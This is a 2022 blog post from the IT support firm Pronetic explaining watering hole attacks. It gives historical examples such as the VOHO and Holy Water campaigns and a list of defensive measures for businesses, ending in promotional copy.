Tech Insight : What Is A ‘Watering Hole’ Attack?

Written by Pronetic

Pronetic is a leading provider of core IT support for ISO 27001, Cyber Essentials and Cyber Essentials Plus compliance.

January 26, 2022

In this tech insight, we look at what a watering hole attack is, some examples of such attacks, and how businesses can defend against this threat.

Poisoning The Water

A watering hole attack is a targeted, ‘supply chain,’ cyber-attack strategy, similar to spear phishing. With this strategy, the attacker identifies a website that’s frequented by users of a targeted organisation, or entire sector. The attacker then infects the website(s) with malware and identifies weaknesses in the main target’s cyber-security. The attacker then manipulates the ‘watering hole’ site to deliver that malware, such as a Remote Access Trojan (RAT), so that it can exploit these weaknesses.
When a member of the target organisation’s device becomes infected (like drinking from a poisoned watering hole, hence the name) in a way that the target will not notice (also known as ‘drive by’), the attacker can then gain access to the infected device. This can, in turn, enable the attacker to access the target organisation’s network

Stealing and Spying

The goal(s) of this strategy, as with other strategies is/are to steal personal information, banking details, and intellectual property, and/or to conduct espionage. Also, it can enable the attacker to access corporate systems and assets, and potentially gain further details for even more cyber-attacks.

Examples

Examples of watering hole attacks include:

– The VOHO multi-phase Campaign. Back in 2012, attackers compromised a local government website in Maryland and a regional bank in Massachusetts, along with other sites related to the promotion of democracy in oppressed regions. The targets were organisations related to financial services, government agencies, and the defence industry, and the attack involved the use of re-directs and infection by Gh0st RAT malware. The attack saw 32,000 visitors from 731 unique global organisations being re-directed to an exploit site where around 4,000 hosts are believed to have downloaded exploit files, leading to a staggering 12 percent success rate for the attackers.

– From 2017 to 2018, a country-level watering-hole attack was launched in China by the “LuckyMouse”/ “Iron Tiger” group. This espionage campaign was reported to have targeted a national data centre of an unnamed central Asian country. The attackers injected malicious JavaScript code into the official government websites.

– The 2019 ‘Holy Water’ attack targeted Asian religious and charity groups. The attackers used an Adobe Flash update prompt to trigger the malware download. Although the motive was unclear, the attack may have been used for espionage.

How To Protect Your Business From Watering Hole Attacks

Ways that you can protect your business from watering hole attacks include:

– Keep anti-virus and software patches up to date.

– Use browser-based security tools to inform users of bad sites (bad reputation) and extra malware protection.

– Have a good email protection solution and consider using a secure web gateway (SWG) to filter out suspect traffic.

– Regularly inspect and monitor websites that are most visited by employees with a focus on malware detection. Also, have a procedure in place to quickly inform employees not to visit sites that have been identified as compromised.

– Check traffic from all third party and external sites before allowing employee access.

– Assess, know, and control the full extent of your supply chain (a watering hole attack is a supply chain attack).

– Educate/inform and train employees about the nature of the threat and how to avoid it.

– Never click on unknown/suspect links in emails or websites and exercise caution at all times when browsing.

– Consider adopting a ‘zero trust ‘security approach for the business/organisation.

What Does This Mean For Your Business?

This is broadly a supply-chain related attack (web resources) where instead of actively hacking or sending phishing emails, the criminals set traps for unsuspecting victims to walk into. In this respect, it is less obvious for businesses to spot. The first step is recognising and raising awareness of the threat. Following normal security good practice is always helpful plus some additional measures in this case such as identifying, regularly inspecting and monitoring websites that are most visited by employees and focusing on what additional malware protection can be added to employees’ browsers and devices. With an increasing number of more complex and inventive attack methods, many businesses are shifting to a complete ‘Zero Trust’ approach for their IT security. A more a data-centred rather than ‘moat and castle’ view of IT security gives companies greater holistic control and reduces the potential for the kind of gaps that cyber criminals can exploit with strategies like watering hole attacks.

You May Also Like…

0 Comments

Why Choose Pronetic

We Are ISO 27001 & Cyber Essentials Plus Certified

Be reassured that we have been externally audited. You can have complete peace of mind that the team managing your IT systems and safeguarding your data are independently vetted annually.

Seamless & Comprehensive IT Support

Our investment in people, tools and processes, continuously improved, ensures that we don’t just deliver exceptional I.T. support but include your compliance to Cyber Essentials or ISO 27001 “baked-in”. Yes, that means no more annual headaches and stress when your certification comes round.

Expert Support Money Back Guarantee

We're confident in the value we deliver. That's why we offer a 90-day, no-quibble money-back guarantee. If, for any reason, you're not completely satisfied with our IT support services, we'll provide a full refund and cancel your contract without any hassle.

Book Your Free IT Strategy Call Now!

Simply Fill In The Form Below To Receive Your Free IT Strategy Call:

By submitting this form, you consent to us using your personal information to contact you. For more information please see our privacy policy.